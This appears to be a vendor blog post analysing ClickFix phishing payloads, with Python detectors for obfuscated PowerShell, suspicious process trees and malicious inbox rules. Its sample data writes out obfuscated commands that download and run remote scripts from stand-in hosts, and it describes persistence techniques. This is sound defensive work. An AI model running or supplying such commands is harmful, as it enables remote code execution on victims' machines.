
A technical breakdown of a ClickFix payload seen in the wild
Notes for technical teams on characteristics that are often found in these commands:
- Execution policy bypass, so that no script execution warnings or confirmation prompts appear. Look for: -ep bypass, -ExecutionPolicy Bypass, -ex b
- Obfuscated commands, including backticks (in PowerShell) and quotation marks (in CMD), which the interpreter ignores when it parses the command, so the command still runs while string matching on the raw text fails. String concatenation has also been observed.
- Execution chaining, typically involving CMD into PowerShell.
- Flags that hide the window on launch. For example, “-WindowStyle Hidden” in PowerShell, which can be abbreviated to as little as “-w h”, or “headless” in the command prompt.
- Web requests, including but not limited to PowerShell “Invoke-WebRequest”, “iwr”, “DownloadString”, “Start-BitsTransfer”.
- Calls to an external site. These appear as either hardcoded IP addresses or newly registered domains that serve as command-and-control servers or as staging servers hosting the malware.
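The characteristics above can be turned into a scoring routine over process-creation command lines. The following is an added example written for this post, not code from the original article or from Barracuda: it first undoes the obfuscation layers (carets, backticks, split quotes, string concatenation and -EncodedCommand base64), then matches the de-obfuscated text against the execution-policy, hidden-window, CMD-to-PowerShell, web-request and external-host traits. The sample command lines, the indicator names and the alert threshold are all this example's own constructions.

```python
"""Score 4688-style command lines for ClickFix traits (added example, not from the post)."""
import base64
import re

# Regexes applied to the normalised (de-obfuscated, lower-cased) command line.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p|x)\s+b(?:ypass)?\b"),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b|\bheadless\b"),
    "cmd_to_powershell": re.compile(r"\bcmd(?:\.exe)?\b.*\bpowershell(?:\.exe)?\b"),
    "web_request": re.compile(
        r"\b(?:invoke-webrequest|iwr|downloadstring|start-bitstransfer|webclient|curl)\b"),
}
URL_HOST = re.compile(r"""https?://([^\s"'/|;)]+)""")
BARE_IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# -e / -en / -enc / -encodedcommand followed by a base64 blob (PowerShell accepts prefixes).
ENCODED = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")          # 'Inv'+'oke'
SPLIT_QUOTES = re.compile(r"(?<=[A-Za-z])[\"'](?=[A-Za-z])")  # po"wer"shell


def obfuscation_markers(raw):
    """Name the obfuscation tricks visible in the raw (un-normalised) command line."""
    markers = []
    if "`" in raw:
        markers.append("backtick")
    if "^" in raw:
        markers.append("caret")
    if SPLIT_QUOTES.search(raw):
        markers.append("split_quotes")
    if CONCAT.search(raw):
        markers.append("concatenation")
    if ENCODED.search(raw):
        markers.append("encoded_command")
    return markers


def normalize(raw):
    """Strip the obfuscation layers so the indicator regexes see plain text."""
    text = raw
    m = ENCODED.search(text)
    if m:
        try:  # PowerShell encodes the script as UTF-16LE before base64
            decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
            text = text[:m.start()] + decoded + text[m.end():]
        except ValueError:  # not valid base64: leave the blob in place
            pass
    text = text.replace("`", "").replace("^", "")   # escape characters the shells ignore
    text = CONCAT.sub("", text)                      # join 'a'+'b' into 'ab'
    text = SPLIT_QUOTES.sub("", text)                # join po"wer"shell into powershell
    return text.lower()


def analyze(raw):
    """Return the traits found in one command line plus a simple additive score."""
    norm = normalize(raw)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    hosts = sorted(set(URL_HOST.findall(norm)) | set(BARE_IP.findall(norm)))
    if hosts:
        hits.append("external_host")
    obf = obfuscation_markers(raw)
    score = len(hits) + len(obf)
    return {"raw": raw, "normalized": norm, "indicators": hits, "obfuscation": obf,
            "hosts": hosts, "score": score, "suspicious": score >= 3}


def triage(command_lines):
    """Return only the analyses that crossed the threshold, highest score first."""
    results = [analyze(c) for c in command_lines]
    return sorted((r for r in results if r["suspicious"]), key=lambda r: -r["score"])


def _encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines (documentation IPs / reserved TLD; not real IoCs).
SAMPLE_COMMAND_LINES = [
    'cmd.exe /c start /min po^wer^shell -ep bypass -w h -c "iwr http://203.0.113.10/a.txt | iex"',
    "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
    "\"$u='http://updates-'+'verify.example'+'/check.ps1'; "
    "(New-Object Net.WebClient).DownloadString($u) | iex\"",
    "powershell -nop -w hidden -enc " + _encode_ps(
        "Start-BitsTransfer -Source http://198.51.100.7/x.txt -Destination $env:TEMP\\x.txt"),
    "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\"",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(r["score"], r["indicators"], r["obfuscation"], r["hosts"])
```

The additive score is deliberately crude; in practice the normalised text is what you would feed to your existing detection rules, since a rule that matches "Invoke-WebRequest" on the raw command line misses both the concatenated and the base64-encoded variants above.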
Stage 4: Establishing persistence
Once the command is successfully executed, the activity can head in different ways depending on the attackers and their goals.
Our team created a quick and simple script that establishes persistence via WMI event subscriptions. This starts at 21:40 UTC — five minutes after the victim opened the phishing email. It works as follows: a schedule (harmless, for simulation purposes) fires on a 60-second interval and creates and appends to a .txt document. In a real incident, this script would more likely contain a delivery mechanism that fetches the payload at run time, so that it evades disk-based detection.
Popular methods of persistence include:
- Scheduled tasks: The payload creates a scheduled task that re-executes on user login or at set intervals with elevated privileges, often leveraging LOLBins (legitimate Windows utilities like powershell.exe, mshta.exe, rundll32.exe, or cmd.exe) to evade detection. These tasks persist through system restarts.
- Registry run keys: The payload adds a registry value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (or RunOnce for single execution). On user login, Windows automatically executes whatever is referenced in these keys.
- WMI event subscriptions: Using PowerShell, the attackers create a new task using the “Set-WmiInstance” cmdlet, defining when the task triggers and what the task is. This is a more elusive method of scheduling jobs compared to Scheduled Tasks, as they are more difficult to view, do not generate as many logs, and are often overlooked initially by incident response tools.
Stage 5: The attack unfolds — privilege escalation, data exfiltration, encryption, and more
Once the attackers have a reliable means of access to the network, they will try to gain privileged access to the environment. If they’re successful, they can progress their attack to include data exfiltration, destruction or encryption, and more — all enabled by the success of the initial access phishing email.
Practical steps to stay safe
To reduce risk exposure and mitigate the impact of an attack, organizations are advised to implement the following:
- Phishing-resistant MFA (like security keys). Hardware keys only work on legitimate websites, so attackers can’t trick users into logging in via fake pages and then stealing their sessions. Such keys include YubiKeys, which provide users with protection against proxy sites. YubiKeys use FIDO2/WebAuthn, a protocol that binds authentication to the specific domain the user is visiting.
- Lock down email authentication (through the industry standards of DMARC, SPF and DKIM). Domain-based Message Authentication, Reporting & Conformance (DMARC) is the overarching policy layer built on SPF, which checks whether a sender’s IP is authorized to send on behalf of a domain, and DKIM, which verifies that the message wasn’t tampered with in transit. Properly configured DMARC helps block spoofed emails before they reach users.
- Train users to stop and verify unusual requests. Especially anything that asks them to paste commands, “fix” errors or urgently log in.
- Don’t rely on users spotting bad emails. AI-generated phishing looks realistic and error-free, so security tools must do more of the detection heavy lifting.
- Monitor for suspicious login sessions and behavior. AiTM attacks use stolen session tokens, so look for logins from unusual locations or devices or at irregular times for that user.
- Block or restrict risky system behaviors. Limit access to tools like PowerShell, clipboard access, and “Run” commands wherever possible to reduce ClickFix-style attacks.
- Watch for persistence tricks after compromise. Attackers often add inbox rules, scheduled tasks or background scripts to stay hidden after login.
- Use continuous, automated, intelligent layered security. No single control stops advanced, evasive email attack chains — you need visibility and mitigation capabilities at every stage of the attack lifecycle.
How Barracuda can help
Barracuda helps organizations defend against advanced email attacks by combining protection and cyber resilience across email, applications, data, and networks. For further information and product insight, see BarracudaONE, Barracuda Integrated Email Protection and Barracuda Managed XDR. Barracuda Managed XDR also offers Automated Threat Response (ATR) for email, accelerating real-time containment of threats at the inbox level.
Indicators of Compromise
Endpoint IOCs
All of the following can be detected via Windows Security event ID 4688 (process creation) logs, provided command line auditing is enabled, or via most endpoint solutions.
- Hidden window flags: -w hidden, -w h, headless
- Obfuscated command lines: Backticks, concatenation, and base64 encoding
- Call to external webpages, often newly registered, accompanied by data transfer commands: curl -O https://example.com and DownloadString, iwr, WebClient
- WMI subscriptions: wmiprvse.exe spawning cmd or PowerShell at regular intervals
- Suspicious process tree: Explorer.exe spawning cmd.exe or powershell.exe, a clear indicator that the command was executed via the Run dialog box. Nested commands are common: Explorer.exe → cmd.exe → powershell.exe
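The two process-lineage indicators above (the Run-dialog chain and wmiprvse.exe spawning shells on a cadence) need parent/child context, not just the command line. The following is an added example written for this post, not code from the original article or from Barracuda: it rebuilds process ancestry from 4688-style (time, PID, creator PID, image) records, reports shells whose lineage is explorer.exe followed only by shells, and flags wmiprvse.exe launching cmd.exe or powershell.exe at a steady interval. The events are constructed; PID reuse is ignored, which is an assumption a production version would have to handle.

```python
"""Hunt process-creation events for ClickFix process trees (added example, not from the post)."""
from datetime import datetime, timezone
from statistics import median

SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed 4688-style events: (UTC time, new PID, creator PID, new process path).
SAMPLE_EVENTS = [
    ("2025-01-15T20:00:00Z", 2200, 700, r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ("2025-01-15T21:35:10Z", 1180, 900, r"C:\Windows\explorer.exe"),
    ("2025-01-15T21:36:02Z", 4120, 1180, r"C:\Windows\System32\cmd.exe"),
    ("2025-01-15T21:36:03Z", 4188, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ("2025-01-15T21:37:00Z", 3300, 1180, r"C:\Users\victim\AppData\Local\Programs\Microsoft VS Code\Code.exe"),
    ("2025-01-15T21:38:00Z", 4400, 3300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ("2025-01-15T21:40:00Z", 5010, 2200, r"C:\Windows\System32\cmd.exe"),
    ("2025-01-15T21:41:00Z", 5044, 2200, r"C:\Windows\System32\cmd.exe"),
    ("2025-01-15T21:42:00Z", 5078, 2200, r"C:\Windows\System32\cmd.exe"),
]


def basename(path):
    """Lower-cased file name of a Windows path (os.path would not split backslashes on Linux)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def build_index(events):
    """Map PID -> (creator PID, image basename). PID reuse is ignored (simplification)."""
    return {pid: (ppid, basename(image)) for _, pid, ppid, image in events}


def lineage(index, pid):
    """Walk creator PIDs upward; return basenames from the oldest known ancestor to pid."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        ppid, name = index[pid]
        chain.append(name)
        pid = ppid
    return list(reversed(chain))


def run_dialog_chains(events):
    """Report shells whose ancestry is explorer.exe followed only by shells (Run-dialog pattern)."""
    index = build_index(events)
    parents = {ppid for _, _, ppid, _ in events}
    findings = []
    for _, pid, _, image in events:
        if basename(image) not in SHELLS or pid in parents:
            continue  # report each nested chain once, at its leaf
        chain = lineage(index, pid)
        if "explorer.exe" not in chain:
            continue
        tail = chain[chain.index("explorer.exe"):]
        if all(name in SHELLS for name in tail[1:]):  # explorer -> cmd -> powershell, nothing else
            findings.append(" -> ".join(tail))
    return findings


def wmi_interval_spawns(events, min_count=3, tolerance_s=5.0):
    """Flag wmiprvse.exe launching shells on a steady cadence, as a WMI subscription would."""
    index = build_index(events)
    times = sorted(parse_time(t) for t, _, ppid, image in events
                   if basename(image) in SHELLS
                   and index.get(ppid, (None, ""))[1] == "wmiprvse.exe")
    if len(times) < min_count:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    interval = median(gaps)
    if any(abs(g - interval) > tolerance_s for g in gaps):
        return None  # irregular spacing: not the timer-driven pattern we are after
    return {"parent": "wmiprvse.exe", "count": len(times), "interval_s": interval}


if __name__ == "__main__":
    print(run_dialog_chains(SAMPLE_EVENTS))
    print(wmi_interval_spawns(SAMPLE_EVENTS))
```

Note that the powershell.exe launched under Code.exe is not reported: the lineage check requires every process between explorer.exe and the shell to itself be a shell, which is what separates the Run-dialog pattern from a developer's integrated terminal.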
Email IOCs
- Bulletproof hosting providers: VPNs are commonly associated with suspicious activity, but they are also widely used in legitimate enterprise environments worldwide, which makes them a noisy indicator on their own. A more telling trend Barracuda Managed XDR has been tracking is the rise of bulletproof hosting providers. These are used widely for malicious activity, and the list is likely to include DigitalOcean, PacketHub S.A., Clouvider Limited, ReliableSite LLC, DataCamp Limited, and more.
- Inbox rules: One of the most common post-exploitation actions observed in our SOC is the creation of malicious inbox rules. These are designed to silently filter, hide or redirect specific messages so the victim remains unaware that their account has been taken over.
- Keyword-based filtering rules to automatically move, mark as read or delete any incoming message containing terms relating to the attack like hacked, suspicious, fraud, unauthorized, payment, invoice, etc.
- Auto-forwarding rules that quietly send copies of messages matching financial keywords to an attacker-controlled external address.
- Move-to-folder rules that relocate sensitive messages into rarely checked folders like RSS feeds, Conversation History and Archive.
Since these rules operate silently and persist even after password resets (unless explicitly removed), detecting and remediating malicious inbox rules is a critical step in any email compromise investigation.
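The three rule patterns listed above can be checked mechanically against an export of a mailbox's inbox rules. The following is an added example written for this post, not code from the original article or from Barracuda: each rule record is a constructed dictionary shaped loosely like an Exchange Online inbox-rule export, the organization's own domain is an assumption, and the keyword and folder lists are taken from the text above.

```python
"""Triage inbox rules for post-compromise patterns (added example, not from the post)."""

ORG_DOMAINS = {"example.com"}  # assumption: the tenant's own domains; anything else is external
SUSPECT_TERMS = {"hacked", "suspicious", "fraud", "unauthorized", "payment", "invoice"}
HIDEAWAY_FOLDERS = {"rss feeds", "conversation history", "archive"}  # rarely checked folders

# Constructed rule records: conditions ("contains") and actions, as an export would list them.
SAMPLE_RULES = [
    {"name": "Cleanup", "contains": ["hacked", "suspicious", "unauthorized"],
     "forward_to": [], "move_to_folder": None, "delete": True, "mark_as_read": True},
    {"name": ".", "contains": ["invoice", "payment"],
     "forward_to": ["billing.review@mail-archive.example"], "move_to_folder": None,
     "delete": False, "mark_as_read": False},
    {"name": "Archive old", "contains": ["invoice"],
     "forward_to": [], "move_to_folder": "RSS Feeds", "delete": False, "mark_as_read": True},
    {"name": "Newsletters", "contains": ["newsletter"],
     "forward_to": [], "move_to_folder": "Newsletters", "delete": False, "mark_as_read": False},
]


def assess_rule(rule):
    """Return a list of human-readable reasons this rule matches a known malicious pattern."""
    reasons = []
    terms = {t.lower() for t in rule["contains"]}
    hides = rule["delete"] or rule["mark_as_read"] or bool(rule["move_to_folder"])
    matched = sorted(terms & SUSPECT_TERMS)
    if matched and hides:
        reasons.append(f"keyword filter on {matched} that hides matching mail from the user")
    for addr in rule["forward_to"]:
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain not in ORG_DOMAINS:
            reasons.append(f"auto-forward to external address {addr}")
    folder = (rule["move_to_folder"] or "").lower()
    if folder in HIDEAWAY_FOLDERS:
        reasons.append(f"moves mail into rarely checked folder '{rule['move_to_folder']}'")
    return reasons


def triage_rules(rules):
    """Return (rule name, reasons) for every rule that tripped at least one check."""
    return [(r["name"], assess_rule(r)) for r in rules if assess_rule(r)]


if __name__ == "__main__":
    for name, reasons in triage_rules(SAMPLE_RULES):
        print(f"{name!r}: " + "; ".join(reasons))
```

The keyword check only fires when the rule also hides the message (delete, mark as read or move); a forwarding rule is reported on the destination domain instead, so a rule that merely forwards invoices to an internal colleague stays quiet while the same rule pointed at an external mailbox does not.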
